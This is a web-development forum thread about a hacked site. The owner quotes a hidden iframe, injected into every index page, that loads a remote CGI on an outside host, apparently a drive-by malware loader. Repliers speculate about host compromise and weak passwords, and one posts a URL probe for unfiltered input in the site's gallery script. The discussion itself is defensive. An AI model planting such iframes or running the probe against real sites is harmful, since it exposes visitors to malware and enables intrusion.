Jump to content

Recommended Posts

Hey guys and gals,

 

My website was recently modified by an outside source, and I'm not sure how it was done.

 

Basically, the following code was added right after the <body> tag in every index file on the site.

 

<iframe src="http:// aamane06.isa-geek.com: 8080/ts/ in.cgi?open3" width=574 height=0 style="visibility: hidden"></iframe>

 

(I added some spaces in there so no one clicks on it).

 

This is about the only thing I have been able to find : http://forum.joomla.org/viewtopic.php?f=432&t=438367

 

Anyone else seen this?

 

I'm wondering if anyone has any tips on how I can prevent this from happening in the future. I don't have any real fancy scripting on the website, other than a few forms to gather email addresses and such, but every input is filtered before being processed.

 

Any insight?

 

Thanks!

 

Oh, and the website in question : http://www.agtronicmotorsport.com

Link to comment
https://forums.phpfreaks.com/topic/173687-site-hacked-a-few-questions/
Share on other sites

Simple

 

I had this issue in one of my websites (but with a different code), the problem was in the host computers. Every time I removed it it came back and I tried everything but nothing worked. After 4 months I changed my cpanel password to a very complex one, and then problem solved :).

 

Simple

 

I had this issue in one of my websites (but with a different code), the problem was in the host computers. Every time I removed it it came back and I tried everything but nothing worked. After 4 months I changed my cpanel password to a very complex one, and then problem solved :).

 

I don't quite understand that. Why would it matter the password? Either way your server provider knows the password so how would it prevent them or the hacker of the server to modifiy your file pages?

The issue probably going to be either your host is vulnerable and someone is able to mess with other user's files on the server, or your script is vulnerable.

 

One possible place for the latter, am I unfiltered in your command line here?

 

http://www.agtronicmotorsport.com/gallery.php?action=view&gallery=18257fb6a5f3e735

 

http://www.agtronicmotorsport.com/gallery.php?action=view&gallery=./18257fb6a5f3e735%20#comment

  • 2 weeks later...

Simple

 

I had this issue in one of my websites (but with a different code), the problem was in the host computers. Every time I removed it it came back and I tried everything but nothing worked. After 4 months I changed my cpanel password to a very complex one, and then problem solved :).

 

I don't quite understand that. Why would it matter the password? Either way your server provider knows the password so how would it prevent them or the hacker of the server to modifiy your file pages?

 

IF you do not trust you host provider why host with them at the first place. The problem is that the servers are compromised, so to prevent someone else on hosting his files on the same server to hack or identity your password you have to change your password to a very lengthy complicated one.

This thread is more than a year old. Please don't revive it unless you have something important to add.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Restore formatting

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...

Important Information

We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.